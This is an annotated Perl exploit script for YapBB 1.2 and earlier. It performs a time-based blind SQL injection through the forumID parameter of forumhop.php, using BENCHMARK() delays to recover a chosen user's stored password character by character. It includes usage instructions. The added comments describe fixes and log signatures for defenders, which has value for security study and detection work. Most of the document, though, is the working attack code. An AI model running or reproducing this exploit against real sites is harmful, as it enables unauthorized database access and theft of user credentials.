# Title : YapBB <= 1.2 (forumID) Blind SQL Injection Exploit
# Published : 2009-02-04
# Author : darkjoker
--+++======================================================+++--
--+++====== YapBB <= 1.2 Blind SQL Injection Exploit ======+++--
--+++======================================================+++--
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;
# Print the usage banner and exit via die().
#
# Called by the driver when the mandatory third argument (nickname) is
# missing. The bare "n" characters inside these string literals look like
# "\n" escapes whose backslashes were lost when the listing was extracted;
# as printed, the whole message would run together on one line.
sub usage
{
die "nYapBB <= 1.2 Blind SQL Injection Exploit".
"n[?] Author : darkjoker".
"n[?] Site : http://darkjoker.net23.net".
"n[?] CMS Site: http://yapbb.sourceforge.net/".
"n[?] Usage : perl ${0} <hostname> <path> <username> [<key_list>]".
"n[?] Ex. : perl ${0} localhost /YapBB root abcdefghijklmnopqrstuvwxyz".
"nn";
}
# Build the forumID value for one oracle probe.
#
# Arguments: $user - nickname whose stored password is being read;
#            $chr  - numeric ASCII code to test (the caller passes ord());
#            $pos  - 1-based character position within the password
#                    (MySQL SUBSTRING counts from 1).
# Returns the expression with spaces and single quotes replaced by %20 and
# %27; nothing else is URL-encoded.
#
# This is a time-based blind injection: the exploit assumes forumID is
# interpolated into the SQL statement unescaped, so the injected IF()
# decides whether BENCHMARK() burns CPU on the database server. The
# defensive fix is to cast forumID to an integer or bind it as a
# parameter; for detection, BENCHMARK(, SUBSTRING( or ASCII( inside a
# query-string value is a reliable log/WAF indicator.
sub query
{
my ($user, $chr, $pos) = @_;
my $query = "123 OR IF ((ASCII(SUBSTRING((SELECT password FROM ".
"forum_user WHERE nickname = '${user}'),${pos},1))=${chr}),BENCHMARK(200000000,CHAR(0)),0)";
# Minimal percent-encoding so the value survives in a GET query string.
$query =~ s/ /%20/g;
$query =~ s/'/%27/g;
return $query;
}
# Send one probe request and report whether the server stalled.
#
# Arguments: $hostname, $path - target host and forum base path;
#            $user - nickname under test;
#            $chr  - the single character being tested;
#            $pos  - 1-based password position.
# Returns 1 when the request took more than 4 whole wall-clock seconds
# (read as "the guessed character matched"), otherwise 0. Dies if the
# TCP connection cannot be opened.
#
# Each call is one plain HTTP/1.1 GET to port 80 with the payload in the
# forumID parameter of forumhop.php; for defenders, a request to that
# script with a non-numeric forumID that takes several seconds to answer
# is the observable footprint.
sub exploit
{
my ($hostname, $path, $user, $chr, $pos) = @_;
$chr = ord ($chr);   # query() wants the numeric code, not the character
# Indirect-object "new Class (...)" syntax; Class->new(...) is the
# conventional form.
my $sock = new IO::Socket::INET (
PeerHost => $hostname,
PeerPort => 80,
Proto => "tcp"
) or die "n[!] Exploit failed.nn";
my $query = query ($user, $chr, $pos);
# Hand-built request. "rn" here (and "n" in the die messages) appears to
# be "\r\n" with the backslashes lost in extraction.
my $request = "GET ${path}/forumhop.php?action=next&forumID=${query} HTTP/1.1rn".
"Host: ${hostname}rn".
"Connection: Closernrn";
# NOTE: a lexical $a masks the global sort variable; perl warns about this.
my $a = time ();
print $sock $request;
# Drain the whole response. The loop body bumps $_ (the line just read)
# and discards it; only the read itself matters.
$_++ while (<$sock>);
$a = ($a - time ()) * -1;   # elapsed seconds, i.e. time() - start
close ($sock);
# 4 s threshold separates the BENCHMARK() stall from a normal response;
# integer-second resolution and network jitter make it coarse.
return 1 if ($a > 4);
return 0;
}
# Driver: take the target from the command line, then recover the stored
# password one character at a time through the timing oracle.
#
# Positional arguments: hostname, forum path, nickname, optional key list.
# The nickname is mandatory (an empty or "0" value also triggers usage()).
# Without a key list the search alphabet is [a-zA-Z0-9].
my ($hostname, $path, $user, $k_list) = @ARGV;
usage unless ($user);
my @key = split ("", ($k_list) ? $k_list : "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789");
my $chr = 0;   # index into @key of the character currently being tested
my $pos = 1;   # 1-based position within the password
my $password;  # accumulates matched characters; stays undef if none match
# For each position, try every key-list character until exploit() reports
# a match, then advance; stop at the first position where nothing matches
# (end of the value, or a character outside the key list). Cost a defender
# should expect in the logs: up to scalar(@key) requests per recovered
# character, each spending seconds inside BENCHMARK() on the database
# server, so a DB CPU spike plus a burst of slow forumhop.php hits from
# one client is the signature.
while ($chr < scalar (@key))
{
if (exploit ($hostname, $path, $user, $key [$chr], $pos))
{
$password .= $key [$chr];
$chr = 0;
$pos++;
}
else
{
$chr++;
}
}
# Under "use warnings" this prints an uninitialized-value warning when no
# character was ever matched.
print "n[+] Password: ${password}nn";